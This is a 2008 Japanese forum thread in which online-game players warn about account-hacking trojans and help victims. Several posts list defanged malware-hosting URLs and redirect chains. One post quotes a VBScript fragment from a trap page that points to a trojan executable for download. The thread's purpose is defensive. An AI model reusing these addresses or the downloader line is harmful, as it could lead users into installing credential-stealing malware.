576 ：（○口○*）さん sage ： 2008/05/13(火) 18:15 ID:6MJB2Sv40

どこのblogパーツだか知らんが、好きに踏んで自滅しとけ。

577 ：（○口○*）さん sage ： 2008/05/13(火) 18:19 ID:qlcwVDtb0

どこのって、キミは何の板に来てるつもりなんだい？

www.ragnarokonline.jp/rofan/blog_parts/index.html

578 ：（○口○*）さん sage ： 2008/05/13(火) 19:15 ID:6MJB2Sv40

>>577
>>570で言ってることと矛盾してると気付け。ろくに情報も出さない奴に対してまともな応対しちゃだめだ。
相談用テンプレも埋めない奴は、冷たくあしらっておけ。

579 ：（○口○*）さん sage ： 2008/05/13(火) 19:52 ID:3myvFwcF0

>>572です
よく説明もなしに話題出してごめんなさい。

>>577さんが教えてくれたアドレスでも見れるけど、
今日から配布が始まった、ROの新しいブログパーツの話です。

時計機能と、ブログパーツを貼ってるブログにランダムで飛べるボタンがついてるんだけど、
そのランダムで飛べるシステムだと、飛ぶ先のアドレスを確認できないから、
最近増えてる罠blogとか、下手すれば普通の罠サイトにだって
簡単に飛ばせるんじゃないかって思いました。
ブログパーツとはいえ、サイトに貼ることも十分可能だからね。

貼り付けるのは構わないけど、飛ぶときは注意したほうがいいんじゃないかな、
って言いたかったので書き込みました。

580 ：（○口○*）さん sage ： 2008/05/13(火) 20:03 ID:sjdSVBnU0

もっと言うとこれだな
ttp://www.ragnarokonline.jp/rofan/blog_parts/weblink.html
>gooブログでのブログ開設を記念！
>公式ブログで使用しているイラスト使った、ブログパーツです。
>「ラグナロクオンライン仲間のブログへ飛ぶ」をクリックすると、
>同じパーツを使用している人のブログにランダムで行くことができます。
>時計機能付きで、イラストは全17種から選べます！

ちなみにスクリプト本体はガンホーの鯖内

581 ：（○口○*）さん sage ： 2008/05/13(火) 20:09 ID:fgaLe2k/0

>579
既にあちこちで言われてるけど、罠Blogに飛ばされる可能性は十分ある。
なんせ貼り付けるだけでいいんだから、中華お得意のコピペした罠ページを作って
そこにパーツを張っておけば、そのうち誰かが踏んでくれるわけだし。

>飛ぶときは注意したほうがいいんじゃないかな
注意するも何も、Webリンクで罠Blogに飛ばされた場合、手遅れとなるわけで。

仮に癌が神管理を行ってその辺りに飛ばさないように対策を講じたとしても
対策までのタイムラグを考慮すると、絶対に安全とは言えない。
ましてや紙管理な癌の運営を考えると……

結局「クリックするな・飛ぶな」しか自衛策は無いんじゃないかな。

582 ：（○口○*）さん sage ： 2008/05/13(火) 20:14 ID:fyr/XE9U0

Adblock Plusマジｵﾇﾇﾒ

アカハック罠以外にも、アフィやフィッシングに転用される事も考え得る範囲だし、現時点では触らない方が賢明か。
後は、クッションページを導入するように、投稿フォームから投げ続けるべきか。

583 ：（○口○*）さん sage ： 2008/05/13(火) 20:59 ID:6MJB2Sv40

システム的に、そのBlog内に、iframeタグが置けるかどうかとか、カーソル変更の設定があるかどうかなど
Blog自体の脆弱さがあるかどうか調べないとなんとも。

危険なサイトに飛ばされる「可能性が０ではない」ことだけは言える。
「露骨に心配する程度かどうか」については、一般のサイトやBlogを訪問する時と同じような危険度でしかない。
（そこに何が置かれているか事前にはわからないという意味で）

事前にソースチェッカーオンライン等で確認するのが困難という意味では、自衛が取りにくいとは思う。

自衛するのであれば、積極的に、ダウンローダやスクリプトの遮断を行なっているセキュリティソフトに
頼るしかないのが実情。個人的には、AntiVirのスクリプトへの対応の幅広さには注目している。
カスペは報告数次第。報告があれば対応する感じで、検体の提出がない新パターンは結構すり抜ける。
NOD32(ESS)は、ダウンローダ系はすり抜けさせて、本体をブロックする趣旨のようで、提出しても対応は
あまり進んでいない。（その分、ヒューリスティックスキャン入ってても軽い訳だが）

584 ：（○口○*）さん sage ： 2008/05/13(火) 21:38 ID:EKatEIqJ0

確かに危険度は同じだが、影響という点ではWebリンクは大きい。
同じコミュニティを見に行く（しかも内容は不明）で、罠リンクのような
特徴ある警戒心を起こしにくい。
というか、油断しがちになるので、踏む率は罠リンクより大きい。
（どこまでパーツが普及するかという問題はこの際置いてる）

クリック時の警戒が意味を為さないので、スクリプトOFFやPG2、hosts変更と
いった、ある種アクティブな対策をしないと危険。
で、この手のコミュはその手に弱いケースもままある。

やっぱり飛ぶなクリックするな、が正解としか思えないな。

585 ：（○口○*）さん sage ： 2008/05/13(火) 23:03 ID:5ATbsKXu0

アカハック注意、ってまがりなりに注意してる公式が
アカハックURLに飛ばないようにする対策＝そのブログパーツを使わない
になるブログパーツを用意するってどういうことだ・・・

586 ：（○口○*）さん sage ： 2008/05/14(水) 04:17 ID:SSbZGnph0

>>574
9.0.124.0って、もう3月頃には更新されてたよ。

587 ：（○口○*）さん sage ： 2008/05/14(水) 09:23 ID:ljs1A7MT0

WindowsUpdateの日だぞ〜

588 ：（○口○*）さん sage ： 2008/05/14(水) 18:15 ID:WbYtj5jC0

緊急(3) 警告(1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-may.mspx
OfficeやLive Onecare、Jetデータベースエンジン絡みのKBなので、影響の無い人も多いかも。

589 ：（○口○*）さん sage ： 2008/05/14(水) 20:25 ID:thAWjCom0

ウィンドウズが再起動を繰り返して困ってます
ウィルスですか？

とかそういう質問はまだないのかな？

590 ：（○口○*）さん sage ： 2008/05/14(水) 20:42 ID:S0/wfPV10

XPのSP3入れた一部環境で発生するとかいうあれか。AMDだけど発生しなかったなぁ。

591 ：（○口○*）さん sage ： 2008/05/14(水) 20:49 ID:ljs1A7MT0

>>598
セキュリティと関係無いからね。
メーカのサポセン、教えてgoo、答えてねっと、OKWave、2ch、お好きに。

592 ：（○口○*）さん sage ： 2008/05/14(水) 20:50 ID:ljs1A7MT0

>>589 だった。

593 ：（○口○*）さん sage ： 2008/05/15(木) 00:05 ID:0kzzaiYo0

Fujisan.co.jpがサイト改竄、SQLインジェクションでウイルス仕込まれる
ttp://internet.watch.impress.co.jp/cda/news/2008/05/14/19543.html

594 ：（○口○*）さん sage ： 2008/05/15(木) 16:04 ID:rbQ/QOxt0

アカハックマジ怖い

これまで一度も踏んだことが無かったから気の緩みがあったんだろうが
スキャンしてみたら発見、その日はROのサイト一切行ってないんだが
なんか防衛する自信なくなってきた･･･

595 ：（○口○*）さん sage ： 2008/05/15(木) 16:15 ID:MaigzpJ30

垢ハックだけならまだいいさ
垢ハックが仕込めるなら他のスパイウェアも仕込めるわけで

ちなみに最近の流行は無差別散布
ゲームなんてしないとか言って油断してる人を踏み台にする

596 ：（○口○*）さん sage ： 2008/05/15(木) 18:50 ID:0m+wixl80

BitDefender、ネットゲーム利用者専用のセキュリティソフトを発表
ttp://internet.watch.impress.co.jp/cda/news/2008/05/15/19565.html
うーん…。

597 ：（○口○*）さん sage ： 2008/05/15(木) 18:53 ID:7TK7O+uw0

ただ単に「ゲームしてるときは大人しくしてます」ってだけみたいだね
今でも自動アップデートやらスキャンは使う人間の設定次第では

598 ：（○口○*）さん sage ： 2008/05/15(木) 18:54 ID:0m+wixl80

うん。だから微妙だなぁと。

>>593
スキャン
ttp://www.virustotal.com/analisis/9c675a56d3c8dfef9b72c80d8577b76c
たぶん提出済み。

599 ：（○口○*）さん sage ： 2008/05/16(金) 13:50 ID:DbONPhyW0

Wiki活用例
ttp://rosafe.rowiki.jp/index.php?MMOBBS%A5%B9%A5%EC%A5%C3%A5%C9%A4%CE%BA%A3%B8%E5

600 ：（○口○*）さん sage ： 2008/05/16(金) 14:41 ID:8AdZdQgg0

>>599
＞Wiki活用例
ただの例なのか、投票に持ち込みたいのかよくわからないけど
安易に投票（というかアンケート）へ走るのもどうかと。

というか「LiveROへの統合」の賛成的意見は聞くけど
明確な反論やそれ以外を支持するレスってあったっけ？

601 ：（○口○*）さん sage ： 2008/05/16(金) 15:46 ID:CbW4QXNv0

>>600
危険アドレスの報告以外に、体験談の投稿が総合スレに移動したら、そのままでいいんじゃないかって
意見なら出した気がする。無理にどっちか消す事もない。

過度の誘導については、総合スレのテンプレに一言注意を入れときたいところだが、潰す必要はないかと。

取り敢えず、アンケートしようって意見に賛意が出た訳じゃないうちにやっちゃうのはどうかと。
>>599のリンク先のコメントにあるように、多重投稿できるし、アンケートはやめた方がいいと思う。

602 ：（○口○*）さん sage ： 2008/05/16(金) 21:58 ID:bBkdjN930

なにかの予防になるかとROのIDとPASS、ガンホーIDとPASSの入力を
クッキー等で保存せず、毎回手入力をしているのですが、もしも垢
ハックのウィルスなどにかかっていた場合、そういった保存しない
手入力のものも読み取ってしまうものなのでしょうか？

知らないうちに感染してたらと思いこの入力を続けていたのですが、
まとめページなどを読み進めていたら果たして有効なのかと不安に
なってしまって…

素朴な疑問なのですが、お答え頂けたら嬉しいです。

603 ：（○口○*）さん sage ： 2008/05/16(金) 22:08 ID:r0zIn8610

>>602
使っているパソコンが他の人も使うことがあるなら、有効だと思います。
ログイン画面に残っているIDを読み取られないという意味では。

キーロガー（キーボードから入力した内容を送信する）が仕込まれている場合は
無意味になります。

604 ：（○口○*）さん sage ： 2008/05/16(金) 22:46 ID:CbW4QXNv0

>>602
アカハックトロイが発動中なら、入力した時点で読み取っているので、無駄。

クッキーや、AIroboformのようなパスワード管理ソフトへの保存をしていないとしても
あんまり意味はありません。それは、そのPCを他の人がいじった時に直接盗まれるかどうか
の問題でしかなかったりします。

アカハックトロイを踏まないこと、発動させないこと、削除すること。その基本を忘れずに。

605 ：602 sage ： 2008/05/17(土) 00:41 ID:+lHVq62p0

入力した内容を送信するようなものもあるのですね…
603さん604さん、お答えありがとうございました！

606 ：（○口○*）さん ： 2008/05/17(土) 00:54 ID:uJliC+eg0

【　 　 　 気付いた日時　 　 　 　 　 】08/05/10
【不審なアドレスのクリックの有無　】 ブログのコメントを誤って踏む
【　　アドレス 　 〕http://yaplog■jp/lmhtmy
【　 　　 OS　 　 】XP　Pro　SP2
【使用ブラウザ 】 firefox　2.0.0.12
【WindowsUpdateの有無】 ２週間前ほど
【　アンチウイルスソフト 】avast!
【その他のSecurty対策 】 ADaware
【 ウイルススキャン結果】 Avast検出なし。カスペオンラインでも実行したが検出なし。
DrWebのオンラインスキャンでもスキャン。検出無し
【hosts変更】無
【PeerGuardian2導入】無

全く同名のブログがあり、罠のほうを踏んだ（私が踏んだほうの更新が少しだけだった）
と思いスキャン。
結果、何も出ず。

ソースチェッカーで見たところ、iframeがあり
URLをaguseでチェックしたところ、中国。
やられたかと思ったけど、移動先にはなにもない・・・

これは私のソースチェッカーの見方が悪いのでしょうか？
もしトロイがある場合にはソースチェッカーではどのように表示されるのでしょうか？

色々自分なりに調べてみましたがわからなかったため教えていただきたいと思います。

607 ：（○口○*）さん sage ： 2008/05/17(土) 02:02 ID:wfo8zgnT0

tinyurl(短縮URLサービス)を使った、iframeでサイズ０の典型的な罠だが
飛び先が何も無い感じ。

中華は時々書き間違いのミスやるが、今回のケースは多分tinyurl側が
削除したと思われる。
(>510のtinyurlも、今現在は同じようにデリられてる)

なので、多分、無害。


>もしトロイがある場合にはソースチェッカーではどのように表示されるのでしょうか？
既知の場合は危険アドレスと出る場合もあるが、大抵はソース見て判断。
一例を挙げると、ハクスレ669で報告のあった www■lyjpyx■com/boy/ とか
>510の www■panslog■net/wiki/index1■htm とか。
罠リンクを辿ると、最終的にこういった感じのページが出てくる。

※共に生きてる罠アドレスなので、直で踏まないように。

608 ：（○口○*）さん sage ： 2008/05/17(土) 02:54 ID:VpK8gybw0

>>607
こちらで確認した感じでは、>>606の中身も>>510もまだ生きてた。
なので、安易に踏むべきではない。

TinyURL関連で調べていたら、丁度良さそうな対策の記述を見つけた。
第６回：TinyURL の遷移先が怖くて開けない場合の対処法 ::: creazy photograph
ttp://creazy.net/2007/05/tinyurl_defend.html
>２）もっと便利な Greasemonkey がありました。
>　・TinyURLのリダイレクト先URLをツールチップ表示するGreasemonkeyを作った
ttp://d.hatena.ne.jp/ono_matope/20070428#1177790750

>４）オチ：ちゃんとプレビュー機能あった
>TinyURL の機能で遷移する前に遷移先の URL を表示して確認する事ができるらしい。
>　・Preview a TinyURL
>「Click here to enable previews.」リンクをクリックするだけ。
(NGワードに引っ掛かるので、TinyURL自体の設定ページは省略)

4)を実行するとCookieを食わされるので、TinyURL関連のクッションページが有効になる模様。

609 ：607 sage ： 2008/05/17(土) 04:03 ID:wfo8zgnT0

>608
そんな馬鹿な、と再度チェックしたら、何か復活してた……
テスト環境(VMWare/Ubuntu8.04(火狐3β5))上でソースチェッカー
＋直で飛んで確認もしたんだけど……

結果として誤報となってしまい、申し訳ないです＞606、ALL

yaplog■jp/lmhtmy
-->tinyurl■com/yr9mtf/
---->www■wacacop■net/blog/
------>www■wacacop■net/wiki/index1■htm　(VirusTotal：17/32)
-------->www■wacacop■net/wiki/sever■exe　(VirusTotal：5/32)

>606
index1■htm　はカスペ・AVG・Microsoft等、半数は検出したものの
NOD32・Avast・McAfee・Symantec等はスルー

sever■exeは　AVG・eSafe・F-Secure・Microsoft・Norman　のみ検出
Avast・カスペ・NOD32・McAfee・Symantec　等々多数がスルー

AVGが共に検出してるので、念のためAvastアンインスト・AVGインストで
チェックしてください。
WUしてるから、多分引っかかってないと思うけど……


取りあえずカスペとNOD32に検体提出してきます。

610 ：607 sage ： 2008/05/17(土) 05:18 ID:wfo8zgnT0

カスペより返答

sever■exeはTrojan.Win32.Inject.cbi として、次の更新で対応との事

611 ：606 ： 2008/05/17(土) 06:02 ID:uJliC+eg0

色々混乱を招いてしまったみたいで大変申し訳ございませんでした

AVGで再検索してみたほうがいいみたいですね

ウイルス部分が

</iframe>
<script language=VBScript>
On Error Resume Next
cuteqq = "http://www■wacacop■net/wiki/sever■exe"


とありますが、上記において
firefoxはVBSスクリプトをサポートしていないとの記述がありましたが
firefoxでこのURLを見た場合、ウイルスをダウンロードしないということでしょうか？

612 ：（○口○*）さん sage ： 2008/05/17(土) 09:57 ID:qFD+0j/j0

>>610
Inject系が復活してたのね。

その1 >>606
www■wacacop■net/wiki/sever.exe
その2
www■teamerblog■com/wiki/cer.exe
www■articlelin■com/wiki/cer.exe
その3
www■skywebsv■com/Blog/k1.exe
www■bluewoon■com/Blog/k1.exe

まともに引っ掛けたのはAVGとMicrosoftくらいなので
あちこちに提出済み。

>>611
VBScriptならそのとおり。

613 ：607 sage ： 2008/05/17(土) 10:17 ID:wfo8zgnT0

先ほど確認した所、カスペがsever■exe をキャッチ。
多分オンラインスキャンでも検出すると思う。

>612
カスペのウィルスウォッチ( http://www.kaspersky.co.jp/viruswatchlite )で
Trojan.Win32.Inject で検索したら、5月に入ってから急増してるっぽい。
特に5/13が酷い。

614 ：606 ： 2008/05/17(土) 14:32 ID:uJliC+eg0

>607 608 612
色々相談に乗っていただきありがとうございました

結果報告させていただきます
AVG：検出せず
カスペル： >613の書き込みの後検索したが出ず

万全を期してOS再インスト


これらから推測すると、firefoxで閲覧したためＶＢＳが動かず
exeファイルをＤＬし無かったってことでしょうか。
友人が　ＩＥ＆カスペルを使っていますが・・・カスペルが反応しないとなると
更新前の状態で踏んだ場合知らないうちにトロイをＤＬしているということに。

これを期にＩＥ以外のブラウザを知人たちに教えようと思います。

615 ：（○口○*）さん sage ： 2008/05/17(土) 18:03 ID:2Dg4rTBs0

>>606さんと似たような状況です

【　 　 　 気付いた日時　 　 　 　 　 】今朝
【不審なアドレスのクリックの有無　】 ブログのコメントを誤って踏む
【　　アドレス 　 〕yaplog■jp/lmhtmy
【　 　　 OS　 　 】XP SP2
【使用ブラウザ 】 firefox　2.0.0.12
【WindowsUpdateの有無】 最新
【　アンチウイルスソフト 】avast
【その他のSecurty対策 】 無し。
【 ウイルススキャン結果】 Avast，AVG，カスペオンラインともに検出なし。
【hosts変更】無
【PeerGuardian2導入】無


リンク先をコピペしようとしたところ誤ってクリックしてしまいました。
飛んだ先でAvastが反応。
「サイズ0のiframeが含まれています」といったようなことを言われたので，切断しました。

こちらの都合で再インストールはできないのですが，一応はこれで防げたと考えても
良いのでしょうか。

とりあえず今からPGを導入してきます。

616 ：（○口○*）さん sage ： 2008/05/17(土) 18:31 ID:A3/exu3d0

似たような状況、じゃねーだろ…そのあとの書き込み読んでるのかお前は…

あと再インストールできない都合とか知ったこっちゃないから

617 ：（○口○*）さん sage ： 2008/05/17(土) 19:11 ID:2Dg4rTBs0

すいません，環境と間違えました。

たしかに知っちゃこっちゃないですよね。いらないこと書いて申し訳ありませんでした。
しばらく自分で調べてみます。

618 ：（○口○*）さん sage ： 2008/05/17(土) 20:06 ID:A3/exu3d0

いや、だからそのあとの書き込みをだな…

619 ：（○口○*）さん sage ： 2008/05/17(土) 20:28 ID:2Dg4rTBs0

読みました。


なんというか，大変申し訳ありませんでした。

620 ：（○口○*）さん ： 2008/05/17(土) 20:49 ID:9fpUrjl60

【　 　 　 気付いた日時　 　 　 　 　 】さきほど
【不審なアドレスのクリックの有無　】 ブログのコメントを誤って踏む
【　　アドレス 　 〕www■wacacop■net/blog/
【　 　　 OS　 　 】XP SP2
【使用ブラウザ 】 firefox　2.0.0.12
【WindowsUpdateの有無】 最新
【　アンチウイルスソフト 】ｳｲﾙｽﾊﾞｽﾀｰ08
【その他のSecurty対策 】 無し。
【 ウイルススキャン結果】 カスペオンラインで反応あり。
【hosts変更】無
【PeerGuardian2導入】無


sever■exeを踏んだ場合、踏んだタイミングで情報もっていかれてるのか
それともROを起動してIDやらパスをいれた時にもっていかれるのか
どちらでしょうか。

621 ：（○口○*）さん sage ： 2008/05/17(土) 21:33 ID:I8bGtz6l0

なぁ……テンプレの
>【テンプレの参考サイトを読んだか】 (Yes/No/今から読みます)
この行消したの誰だよ……

622 ：（○口○*）さん ： 2008/05/18(日) 00:07 ID:pwS4xnkZ0

>>621
必要ないから消したのではないでしょうか？
すみからすみまで見たわけではないですが色々サイトは見てきました。
調べてもわからなかったから聞いています。
それでも参考サイト見て来いというのならばどのサイトのどの辺りを見ればよいでしょうか？

623 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/18(日) 01:29 ID:QkayuTPu0

>>621
テンプレ>>4にはちゃんとあるのですが…。
つい最近だとテンプレを活用している例があまり無くて
>>606の書き込みでその項目を消した物を確認。

それ以降の書き込みでは>>4のテンプレではなく、
最近の書き込みから流用したのではないかなと。
テンプレ厨と言われるかもしれませんが>>4から持ってきてほしいところ。


>>622
手前味噌ですが。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#hack01
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#login

"いちおう"踏んだ後にログインしなければOK。

ただ踏んだ後はできるだけネット接続を切断してROだけに限らず、
パスワードや個人情報関連を利用するソフトウェアや
ウェブサイトにはログインしない事が大事です。

ただ踏んだからといって盗まれるわけでもないですが、
色々なものが複合している場合もあり、
MSNやmixiなどIDやpassをクッキー登録できるものは
踏んだ直後に持っていかれている可能性があるかもしれませんので
一概には言えないのです。

624 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/18(日) 01:31 ID:QkayuTPu0

ただ　が多い文章だわ。

こちらの例の方がわかりやすいかもしれない。
http://sky.geocities.jp/ro_hp_add/ro_higakyu.html#jirai

625 ：（○口○*）さん sage ： 2008/05/18(日) 02:43 ID:/J83Yn5y0

>>608でも既出だけど、TinyURLのダイレクトジャンプ禁止設定はテンプレ入りした方がいいかもしれないな。
ttp://tinyurl■com/preview.php にアクセス、Click here to enable previews.をクリック。
これでCookieを取得したブラウザからは、飛び先URLの確認ページが表示されるようになる。
無論、使用しているブラウザごとに実行する必要があるが、有効期限は取得時刻+10年らしいので、まず問題ないだろう。

626 ：（○口○*）さん sage ： 2008/05/18(日) 18:54 ID:02D0LKNv0

今更だけど
http://common.ragna.info/index.php?rosafe_log
このスレの４のログが実際保存してる

弓手Wikiの中の人に頼んで
これと同じプラグインとか入れてもらえばいいんじゃね？
そしたらログを保存できるよ

627 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/18(日) 23:37 ID:qudYSdAg0

>>608 >>625
TinyURLのダイレクトジャンプ禁止設定についてのログ部分を転載して
"対処と疑問のQ&A・その2"に追加してみました。
http://sky.geocities.jp/ro_hp_add/ro_tai02.html#tanshuku

628 ：（○口○*）さん sage ： 2008/05/18(日) 23:57 ID:hPHJ5k9G0

スレチだったら申し訳ないのだけれど質問です。

ROアカハックまとめの危険サイトに上がってるアドレスが
「勇気がなくて踏めない〜」では無害判定されてたんだけど、これはどっちを信用した方がいいんだろう？

該当のアドレスはttp://world2001■blog39■fc2■com/
踏んだ後ソースチェッカーとスパイウェアとウイルスチェックかけたけど特に何もなし。

あちこち張られてるから迷惑には変わりないんだけど…。

629 ：（○口○*）さん sage ： 2008/05/18(日) 23:59 ID:Ccjc3wx/0

危険リストは危険が確認されたことのあるサイトのリスト
罠が撤去されてることはあり得る

でも次にアクセスしたときに無害かどうかは保証できない

630 ：（○口○*）さん sage ： 2008/05/19(月) 00:10 ID:uR8cGoLs0

>628
>506以降参照。

念のためチェックしてきたが、>510と同じ状態で罠があった。

world2001■blog39■fc2■com
--->tinyurl■com/6722xv
----->www■articlelin■com/blog
------->www■panslog■net/wiki/index1■htm
------->www■teamerblog■com/wiki/cer■exe

631 ：（○口○*）さん sage ： 2008/05/19(月) 00:18 ID:L30PyHmr0

早々にありがとうございます
チェックに引っかからなかっただけでしたかorz

撲滅に逝って来ます。
あと、怖くて踏めない〜にも一応報告して来ます。

632 ：（○口○*）さん sage ： 2008/05/19(月) 00:32 ID:uR8cGoLs0

ちなみにソースチェッカーでそこ覗いた時、tinyurlの罠がiframeで
仕込まれてるのに、左側の方が何故か反応してない。

そのせいで「勇気がなくて踏めない〜」では無害判定されたんじゃないかな。

一応チェック結果
index1■htm　VirusTotal 16/32
　ttp://www.virustotal.com/analisis/b7367db9f864218998f7e2c74ba109fd
　　Kaspersky　Trojan-Downloader.JS.Agent.brl

cer■exe　VirusTotal 9/32
　ttp://www.virustotal.com/analisis/49853788166688e27cfcd9e5213a1f45
　　Kaspersky　Trojan.Win32.Inject.cbd

共にカスペは撃墜してるが、cer■exe は>510から差し替えられてるっぽい。

633 ：（○口○*）さん sage ： 2008/05/19(月) 04:37 ID:OwDZmYEY0

>>626
BSスレの保管所(BSWikiの中の人が管理)に全部のログも有って、NAMAZU検索も出来るようです。
http://smith.z49.org/kako/ah/

634 ：（○口○*）さん sage ： 2008/05/19(月) 06:01 ID:VTcoYDmA0

見慣れないアドレスにh抜きでもないから、警戒しちまったぜ。。。

635 ：（○口○*）さん sage ： 2008/05/19(月) 08:26 ID:L30PyHmr0

>>632
何から何までありがとうございます（つД`）
スパイウェアチェックかけなおしたらレジストリ変更されてました。危ない。

636 ：（○口○*）さん sage ： 2008/05/19(月) 12:57 ID:Lgxs0xs+0

>>632
>>612 で差し替え。

637 ：（○口○*）さん sage ： 2008/05/20(火) 20:55 ID:gonH0gHp0

カスペルスキー氏がマルウェア激増を予測、検体数は年間2,000万件に
ttp://internet.watch.impress.co.jp/cda/special/2008/05/20/19612.html
世界から見て日本固有の「脅威」には何があるでしょうか。
カスペルスキー氏：Winnyが挙げられるでしょう。
ワンクリック詐欺も日本独特のものといえます。
また、アジア圏では、オンラインゲームを狙ったマルウェアが多いのも特徴です。
欧米でもオンラインゲームはありますが、アジア圏では
プレイ時間が圧倒的に長いことから標的にされているのだと思います。
じつは、こうした被害に対抗するために、中国にアジア向けの解析ラボを立ち上げました。

いきなり現地にラボ立てるかぁ? この鬼軍曹め!

638 ：（○口○*）さん sage ： 2008/05/20(火) 21:29 ID:qr6bUZr60

アジアに建てても意味無いだろ、と思ったら中国かｗ
さすがロシア

639 ：（○口○*）さん sage ： 2008/05/20(火) 21:30 ID:RfMlAVkc0

>>637
どうでもいいけどIDがゴンホー

640 ：（○口○*）さん sage ： 2008/05/20(火) 21:50 ID:et5yPbP/0

検体数が現時点で200万って事は、日に14000件ちかい提出量。
年末に2000万という事は、日に5万を軽く越えるって事だよな……

しかし先日検体投げたら例によって小一時間で返答あったし
このフットワークの軽さだけは奪われないようにして欲しいものだ。


そしてその中国でも大規模なSQLインジェクション攻撃があった模様
ttp://www.itmedia.co.jp/news/articles/0805/20/news023.html

>各種中国語ソフトやRealPlayer、MS Data Access Componentなどの脆弱性
やはりmpackみたいな複合型が主流のようで。
WUしてるから・IE使ってないから、みたいな状況は危険だね……

641 ：（○口○*）さん sage ： 2008/05/20(火) 22:25 ID:gonH0gHp0

>>612 とたぶん同じ系統、更新は今日。
www■soracger■com/wiki/admin.exe
VT ttp://www.virustotal.com/analisis/76b04cccb7cf0306b3ea4c2215979ce8

642 ：（○口○*）さん sage ： 2008/05/20(火) 23:46 ID:gonH0gHp0

BitDefender
ttp://itpro.nikkeibp.co.jp/article/Interview/20080515/301944/
最近ちょっと落ち目なのが気になるが…
(個人的な体感としてAntiVirより下、avastより上)。

643 ：（○口○*）さん sage ： 2008/05/21(水) 15:38 ID:feLZsIS40

カスペルスキーはオンラインゲームと相性悪いと言われてるのが気になるんだよなぁ。
自分も一台カスペいれてるけど、プロアクティブディフェンスONにするとROがプレイ不能くらい
の負荷状況になるし…

この辺をどうにか解消仕手欲しいんだが…

644 ：（○口○*）さん sage ： 2008/05/21(水) 16:36 ID:IJXD2e0G0

>>643
うちもカスペだけどぜんぜん平気だよ〜。
ただ、マップ移動やキャラセレなどのローディングの前のフェードアウトして
画面が暗くなったところで1〜2秒止まるくらい。それ以外はぜんぜんスムーズ。
CPUがペン4なのでローディングの前と後のダブルで止まるけどね＞＜；
普段はRO中もプロアクティブディフェンス有効のままで、Gvレースのときだけ
プロアクティブディフェンスを切っています。

645 ：（○口○*）さん sage ： 2008/05/21(水) 19:54 ID:IVtcw8l30

【　 　 　 気付いた日時　 　 　 　 　 】5/15
【不審なアドレスのクリックの有無　】クリックではなくファイルの解凍で
【　　アドレス 　 】多分ここのファイル　www■forest■impress■co■jp/article/2007/05/18/sumoutori■html
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】firefox2.0.0.14
【WindowsUpdateの有無】 自動更新
【　アンチウイルスソフト 】ウイルスバスター2008
【その他のSecurty対策 】ルータ
【 ウイルススキャン結果】ウイルスバスター2008でTROJ_SMALLTR.YD発見
【テンプレの参考サイトを読んだか】今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
友人からzipファイルを受け取って解凍をしたら
上記のウイルスが検出されました。
慌てて隔離されたウイルスを駆除して
再度スキャンをかけたら検出されなくなったのですが（念の為カスペルスキーでも確認）
上記のウイルスはアカハック系のウイルスなのでしょうか？
ググってみたのですが、自分では判断ができませんでしたので。

646 ：（○口○*）さん sage ： 2008/05/21(水) 20:11 ID:rq1CEHf60

窓の杜なんてアカハックサイトではないだろ。
2chセキュ板のバスタースレで聞けば?

647 ：（○口○*）さん sage ： 2008/05/21(水) 20:25 ID:b971vgOw0

携帯端末が原因なのか分からんが、作者のHPが404で見れない件

取りあえず、怪しいファイルが検討ついてるんだから、VirusTotalに
そのファイルをUpLoadしてはどうか
サイトはググればすぐ出てくるし、検索もすぐだ

648 ：（○口○*）さん sage ： 2008/05/21(水) 20:26 ID:IVtcw8l30

よく見ると確かに窓の社のＵＲＬでした。
失礼しました。
しかしそうなるとこのウイルスはなんなのか・・・

649 ：（○口○*）さん sage ： 2008/05/21(水) 20:28 ID:b971vgOw0

>646
上でも言われてるが、SQL Injection攻撃やらでやられる可能性忘れてないか？
価格コムやMSNを筆頭に、大手サイトに罠を埋め込まれた事例には事欠かない。

杜だから安全だ、なんて事はありえないぞ。

650 ：（○口○*）さん sage ： 2008/05/21(水) 20:30 ID:IVtcw8l30

>>647
すいません、その怪しいと思われるファイルは削除してしましました。

651 ：（○口○*）さん ： 2008/05/21(水) 20:44 ID:5cJfadV30

>友人から
って時点でテンプレの意味まったくナシ

652 ：（○口○*）さん sage ： 2008/05/21(水) 21:16 ID:rq1CEHf60

>>649
サイト・ページのどこかに無差別に仕込むのならともかく
正規のダウンロードのリンクに仕込むのは意外と面倒なんよ。

653 ：（○口○*）さん sage ： 2008/05/21(水) 21:34 ID:lLCiYMFv0

ネット通販利用者の情報など２万件、流出？
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20080521nt04.htm

654 ：（○口○*）さん sage ： 2008/05/21(水) 21:58 ID:1iWEXPgZ0

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALLTR.YD
>別　名: TR/Crypt.XPACK.Gen (Avira), Mal/EncPk-BP (Sophos),
トロイとしか判らんな

>652
>窓の杜なんてアカハックサイトではないだろ。
難易度は別にして、こういう考えは危険、って意味じゃないか？

>653
>約１３０件はオンラインゲームでカードが不正利用されていた。
さすが中華、としか言いようがないな……

655 ：（○口○*）さん sage ： 2008/05/21(水) 22:38 ID:h8jJ+EO60

オンラインゲームの高い匿名性が、ロンダリング手段として確立してきた事の顕れとも言えるか。
課金DLパッケージのような、ある程度まとまった金額のデジタル商品が存在する上に、新規無料垢で売り逃げ可能だからねえ。

656 ：（○口○*）さん sage ： 2008/05/22(木) 00:30 ID:KP0GDB140

ベクターのファイルにウィルスが仕込まれてたのも過去にあったし、無いとは言い切れんよ。
ただ普通のツールでもトロイと検知されてしまうような物もあるからなんとも。

657 ：（○口○*）さん ： 2008/05/22(木) 04:02 ID:s2g2bDCK0

いつの間にやらアカウントハックを受けてました（涙
とりあずウィルスソフトで検索中・・・orz

658 ：（○口○*）さん sage ： 2008/05/22(木) 04:33 ID:6qdg+qJG0

南無

てか報告するスレはわかってても、そこを見て対策するのは後回しってのが未だに多いよね

659 ：（○口○*）さん ： 2008/05/22(木) 07:33 ID:s2g2bDCK0

一応ここも見ててソフトも入れてたんだがな・・・・
ちなみに飯食うために落ちてる間に持ってかれた
23時頃に一度落ちて美味いラーメンを食いにいって
露店だそうそ２時ごろつないだらちょうどアクセスｼﾃﾔｶﾞｯﾀﾖ
